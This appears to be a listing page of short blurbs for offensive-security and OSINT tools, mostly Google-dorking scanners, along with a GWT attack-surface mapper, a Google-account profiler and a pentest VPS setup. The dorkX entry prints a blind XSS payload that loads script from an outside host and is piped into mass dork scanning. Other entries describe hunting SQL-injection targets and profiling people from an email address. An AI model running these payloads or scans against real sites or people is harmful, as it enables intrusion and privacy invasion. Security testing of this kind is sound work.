Search For Documents In A Domain Through Google. The Objective Is To Extract Metadata. Installing dependencies: > git clone https://github.com/Josue87/MetaFinder.git> cd MetaFinder> pip3 install -r requirements.txt Usage python3 metafinder.py -t domain.com -l 20 [-v] Parameters: t: Specifies the target domain. l: Specify the maximum number of results to be searched. v: Optional. It is usedRead More
GRecon (Greei-Conn) is a simple python tool that automates the process of Google Based Recon AKA Google Dorking The current Version 1.0 Run 7 Search Queries (7 Micro-Plugins) on the spicified Target Providing Awsome Results Current Version Run Google Search Queries to find : Subdomains Sub-Subdomains Signup/Login pages Dir Listing Exposed Docs pdf…xls…docx… WordPress EntriesRead More
Grawler is a tool written in PHP which comes with a web interface that automates the task of using google dorks, scrapes the results, and stores them in a file. General info Grawler aims to automate the task of using google dorks with a web interface, the main idea is to provide a simple yetRead More
Fawkes is a tool to search for targets vulnerable to SQL Injection. Performs the search using Google search engine. Options -q, –query – Dork that will be used in the search engine. -r, –results – Number of results brought by the search engine. -s, –start-page – Home page of search results. -t, –timeout – TimeoutRead More
GWTMap is a tool to help map the attack surface of Google Web Toolkit (GWT) based applications. The purpose of this tool is to facilitate the extraction of any service method endpoints buried within a modern GWT application’s obfuscated client-side code, and attempt to generate example GWT-RPC requests payloads to interact with them. More informationRead More
GHunt is an OSINT tool to extract a lot of informations of someone’s Google Account email. It can currently extract : Owner’s name Last time the profile was edited Google ID If the account is an Hangouts Bot Activated Google services (Youtube, Photos, Maps, News360, Hangouts, etc.) Possible Youtube channel Possible other usernames Public photosRead More
Pipe different tools with google dork Scanner Install [email protected] ~/dorkX> git clone https://github.com/ethicalhackingplayground/dorkX [email protected] ~/dorkX> cd dorkX [email protected] ~/dorkX> go build dorkx.go [email protected] ~/dorkX> go build corsx.go [email protected] ~/dorkX> go build csrfx.go [email protected] ~/dorkX> go build zin.go Usage: Blind XSS [email protected] ~/dorkX> ./dorkX -dorks dorks.txt -concurrency 100 | dalfox pipe -b ‘”><script src=https://z0id.xss.ht></script>’ XSSRead More
Create a VPS on Google Cloud Platform or Digital Ocean easily with the docker for pentest included to launch the assessment to the target. Requirements Terraform installed Ansible installed SSH private and public keys Google Cloud Platform or Digital Ocean account. Usage 1.- Clone the repository git clone –depth 1 https://github.com/aaaguirrep/vps-docker-for-pentest.git vpscd vps 2.- CredentialsRead More
The goal of this project was to develop a passive Google dork script to collect potentially vulnerable web pages and applications on the Internet. There are 2 parts. The first is ghdb_scraper.py that retrieves Google Dorks and the second portion is pagodo.py that leverages the information gathered by ghdb_scraper.py.What are Google Dorks?The awesome folks atRead More
uDork is a script written in Bash Scripting that uses advanced Google search techniques to obtain sensitive information in files or directories, find IoT devices, detect versions of web applications, and so on.uDork does NOT make attacks against any server, it only uses predefined dorks and/or official lists from exploit-db.com (Google Hacking Database: https://www.exploit-db.com/google-hacking-database).New functionalRead More
